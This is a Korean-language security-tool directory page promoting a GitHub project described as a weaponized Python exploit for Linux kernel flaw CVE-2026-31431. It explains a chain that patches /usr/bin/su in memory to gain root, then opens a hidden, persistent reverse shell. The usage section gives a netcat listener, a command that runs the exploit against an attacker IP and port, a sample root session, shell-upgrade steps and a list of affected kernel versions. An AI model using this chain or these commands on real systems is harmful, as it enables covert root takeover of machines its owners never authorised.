Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-31431-REVSHELL — # CVE-2026-31431 무기화된 Python 익스플로잇 Linux 커널 권한 상승을 데몬화된 루트 리버스 셸(전체 PTY 포함)로 연결하고, /usr/bin/su를 메모리 내에서 패치하는 CVE-2026-31431용 무기화된 Python 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationPost-ExploitationPenetration TestingRed TeamingPayload Development

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

# CVE-2026-31431 무기화된 Python 익스플로잇 Linux 커널 권한 상승을 데몬화된 루트 리버스 셸(전체 PTY 포함)로 연결하고, /usr/bin/su를 메모리 내에서 패치하는 CVE-2026-31431용 무기화된 Python 익스플로잇입니다.

저장소 보기
3개월 전아직 검토되지 않음


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

개요

FailRoot는 Linux 커널의 crypto: algif_aead 서브시스템에서 발생하는 CVE-2026-31431 — 경계를 벗어난 쓰기(out-of-bounds write) 취약점을 악용하는 무기화된 익스플로잇입니다.

권한 상승과 완전한 PTY를 갖춘 데몬화된 루트 리버스 셸을 연결합니다:

root@kitploit:~
AF_ALG + splice()  →  4바이트 페이지 캐시 쓰기  →  /usr/bin/su 패치  →  root

익스플로잇 전체가 단일 파일에 담겨 있습니다. 컴파일 불필요. 외부 의존성 없음. 디스크에 흔적 없음 — su 바이너리는 메모리에서만 패치됩니다.


기능

  1. 즉시 데몬화 — 이중 fork, 터미널에서 분리, 프롬프트 즉시 반환
  2. 커널 모듈 로드 — 여러 대체 전략을 통한 algif_aead + authencesn
  3. CVE-2026-31431 악용 — /usr/bin/su 페이지 캐시에 4개의 제어된 바이트 쓰기
  4. 루트 PTY 리버스 셸 생성 — pty.spawn("/usr/bin/su") → 완전한 대화형 루트 TTY

리버스 셸은 터미널 종료 후에도 유지되며(SIGHUP 무시), 대상에서 출력을 전혀 표시하지 않고, 최대 3분 동안 재시도하며 연결합니다.


사용법

root@kitploit:~
# 공격자 — 리스너 시작:
nc -lvnp 4444

# 대상 — 익스플로잇 실행 (아무것도 표시되지 않으며, 즉시 데몬화됨):
python3 exploit.py <ATTACKER_IP> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

TTY 업그레이드 (공격자 측, 셸 내부)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

영향받는 커널


요구 사항

  • Python >= 3.10 (os.splice())
  • /usr/bin/su 읽기 권한 (모든 배포판에서 전 세계적으로 읽기 가능)
  • 커널 모듈 algif_aead 및 authencesn 사용 가능
  • sudo 불필요

작성자

danimrtzp


면책 조항

승인된 보안 연구 및 교육 목적으로만 사용하십시오. 오용은 불법입니다.

도구 다운로드
시작종료(제외)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6